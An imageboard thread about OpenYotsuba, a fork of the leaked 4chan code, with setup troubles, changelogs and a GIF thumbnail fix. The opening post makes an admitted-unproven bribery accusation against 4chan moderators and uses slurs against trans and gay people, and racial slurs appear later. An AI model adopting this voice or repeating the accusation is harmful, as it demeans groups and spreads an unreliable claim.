<TLDR>there's a private telegram channel full of bbc-posters, trannies, gooners, and absolute degenerates who charge $500 a month to people who have tokens and these same people infest the posters, janitors, and mods of 4chan. if you pay them, they won't ban threads about your token, and they will generate activity on 4chan and elsewhere about your token. can't prove anything or recall the name because when i saw the kind of disgusting garbage they were posting casually i insta-blocked all of them for being giga-faggots
โ11462[Quote]
What's the most official and progressed fork of the codebase, is it Dizzychan?
https://gitgud.io/dizzyhavoc/dizzychanI would like to launch my own chan based on the leaked codebase, I tried to get
https://gitgud.io/GapeNewell/OpenYotsuba running but I ran into loads of issues after I ran the initialisation php file
โ11547[Quote]
>>11424Sounds believable but no proofs
โ11746[Quote]
uo
โ11872[Quote]
Development on OpenYotsuba 0.3.0 will resume eventually. The main aim of it is fixing bugs and unhardcoding sh!t.
โ11882[Quote]
>install netbeans 8.0.2 on the other pc
>file dated from 2018
>installer says it supports php
gem alarm
โ11884[Quote]
>>11882wtf it shows the splash screen then closes?
โ11957[Quote]
>>11945literally just works and never uses over 1gb of ram
โ11958[Quote]
>damn, not bad, only 2 errors that i dont know how to fix + setting up mysql lol
dizzychan anon here, the only time i think i saw an end of file error was because of a template(?) file (or file containing a template) where PHP was mixed with HTML had a short tag sneakily wedged halfway through the template
no idea if that's the same for you (if you enabled short tags or don't have a problem with short tags)
if i was to guess from the image it looks like a PHP tag opening into `<?php =$form['id'] ?>` and maybe the equals sign shouldn't be there
โ12197[Quote]
>>11872Nice
>>11462Yeah, trying to figure out myself as well.
โ12198[Quote]
>>11957upgrade your core 2 duo cheap ass nigga
โ12301[Quote]
Things I've done
>Ads are now disabled by default (to disable them on 0.2.0, open both files in config/categories and change "ADS_DANBO=yes" to "ADS_DANBO=no"
>Added WebP support (this file format is a bitch due to the lack of support, but thankfully GD, the library used to generate thumbnails, supports it)
>Un-hardcoding links
Full IPv6 support is planned next.
โ12354[Quote]
>>114244chan moderation is so full of evil scum that I genuinely believe you.
โ12361[Quote]
A thought: Why fix it for them? Let it rot.
โ12534[Quote]
The update became bigger than expected, but I'm happy to announce OpenYotsuba 0.3.0 is ready and will be released in a while.
โ12538[Quote]
>>12536do you do it just for fun? do you enjoy refactoring raisinty php code?
โ12539[Quote]
>>12538You got a problem?
โ12551[Quote]
>>12335
so what actually caused that bug? is it the fact that jpeg uses 8x8 tiles and has to overdraw if img.h % 8 != 0 || img.w % 8 != 0?
โ12558[Quote]
>>12551It's a quirk with this function:
https://www.php.net/manual/en/function.imagecreatefromgif.phpNotice this:
>When reading GIF files into memory, only the first frame is returned in the image object. The size of the image is not necessarily what is reported by getimagesize().Specifically, it returns the size of the first frame. Yotsuba happens to use getimagesize() to get the size of the image, but when the two don't match, the thumbnail generates a colored border (which I assume is the first color in the palette) as image data doesn't exist past that point. To fix it, I create a black image with the correct size with imagecreatetruecolor(), set the background to transparent, get the X and Y offset of the first frame in the GIF through a function I made, then paste the GIF into the transparent image with the correct X and Y offsets, width and height.
>>12554What are you getting?
<REDDIT SPACEAlso notice, starting from today I will make daily commits.
โ12571[Quote]
>>12558
>What are you getting?I get a thousand errors and more can you make a more complete tutorial and host the openyotsuba to see how it will look like already installed?.
โ12591[Quote]
https://gitgud.io/GapeNewell/OpenYotsuba/-/commit/46eff3139a72f88846df21cb9edae50775604fa9allow replies with subjects but no comment to be posted
update every file containing mysql_real_escape_string to use mysqli
fix the user behind blotter messages always being "moot"
fix the default favicon in admin/ (1 pixel too short)
delete more -test files
remove unneeded continues from admin/manager/dmcatool.php
fix links in admin/views/index-nav.tpl.php
fix the footer on the homepage on mobile
โ12592[Quote]
>>12571did you follow the readme, it contains the installation instructions
โ12608[Quote]
i
โ12715[Quote]
I have re-added the email field, note that you will need to re-run setup.php when upgrading to the latest master version as I had to change the SQL schema for this.
โ12739[Quote]
https://gitgud.io/GapeNewell/OpenYotsuba/-/commit/3d1fd733e1cbf0c2b9b9d8edaf4cd8db08c802e6add support for MediaWiki-like markup like
headings,
italic text and
bold text (ported from vichan) and <leftarrow/purpletext
create config.php in root and admin/ to make subdomain setups easier
add fixes for mysql_affected_rows (mysqli_affected_rows requires a mysqli connection handle) and fix all instances of mysql_affected_rows to use said fix
more un-hardcoding
add lib/version.php to make updating the version number in the footer easier (version number is now master for master branch builds)
more upgrading to mysqli
delete more -test files
fix calls to mysql_board_escape with invalid arguments in imgboard.php
disable lib/sec.php
โ12778[Quote]
https://gitgud.io/GapeNewell/OpenYotsuba/-/commit/b8cf3bddd9e7ffb625e5b25c33d0482e99ed15f3get all the admin pages in root to load
more un-hardcoding
delete .htaccess files requiring login
upgrade every file containing mysql_num_rows to use mysqli
remove "require_once 'lib/auth.php'" from lib/otp_session.php as it's always loaded by the files that require it
fix warning in admin/stafflog.php
removing more instances of deprecated L::d
make headings bigger than normal text on mobile
remove CAPTCHA requirement from feedback.php
โ12823[Quote]
>yesterday's development update didn't post through awardmay 23:
https://gitgud.io/GapeNewell/OpenYotsuba/-/commit/b8cf3bddd9e7ffb625e5b25c33d0482e99ed15f3add new global_config.ini lines to upgrade instructions in README.txt
get all the admin pages in root to load
more un-hardcoding
delete .htaccess files requiring login
upgrade every file containing mysql_num_rows to use mysqli
remove "require_once 'lib/auth.php'" from lib/otp_session.php as it's always loaded by the files that require it
fix warning in admin/stafflog.php
removing more instances of deprecated L::d
make headings bigger than normal text on mobile
remove CAPTCHA requirement from feedback.php
may 24:
https://gitgud.io/GapeNewell/OpenYotsuba/-/commit/b4f8a7faa2a9a0fad772aea2c1e5c3c3e4ec5a89more un-hardcoding
move board/auth.php and board/signin.php to root
render the email in mobile, fix email CSS bugs
โ12825[Quote]
>>12823add upvotes and reddit gold
โ12842[Quote]
>>12825Better idea: Make it so all moderator and janitor actions are visible to users and make individual moderators accountable. User feedback should stay private for obvious reasons.
โ13024[Quote]
>>12739>>12778>>12823Thank you based gapen
very tempted to launch a European chan site
โ15088[Quote]
up
โ15299[Quote]
why no one has yet tried to install openyotsuba on a public hosting so that we can test it?
โ16997[Quote]
>>15299don't tempt me
also it does say on the repo
*WARNING:* OpenYotsuba is in ALPHA, it's full of bugs. Use this on a
production website
*AT YOUR OWN RISK*
I do want to launch my own chan/s though so I may well just do it and damn the consequences if there is an exploit
โ17127[Quote]
The last commit was 1 month ago. Is it still under development?
โ17176[Quote]
up
โ17241[Quote]
wow interesting
โ17331[Quote]
>>16997someone launched one, can't say the name here for obvious reasons but someone made one.
โ19454[Quote]
>>19442
New license just dropped
โ21144[Quote]
does any website actually use openyotsuba
โ21161[Quote]
>>21160i'd never say o algo
โ21580[Quote]
damn wtf is this dead also i swear this thread had more reppeys
โ21581[Quote]
>>6304ok so how do i create a salt
โ23338[Quote]
Bump. Don't let this thread die
โ25298[Quote]
OP, get back to work already
โ25808[Quote]
Bump
โ26790[Quote]
up/\
โ26877[Quote]
Up
โ29795[Quote]
bvmo
โ29799[Quote]
biggest samefag oat
โ29813[Quote]
>last openyotsuba commit 5 months ago
it's dead
โ30614[Quote]
SECA
โ30910[Quote]
usecase over vichan
โ35372[Quote]
biggest samefag itt o algo
โ37070[Quote]
เนเธเธดเธเธเนเธญเธเธดเธเธเธฅเธฒเธ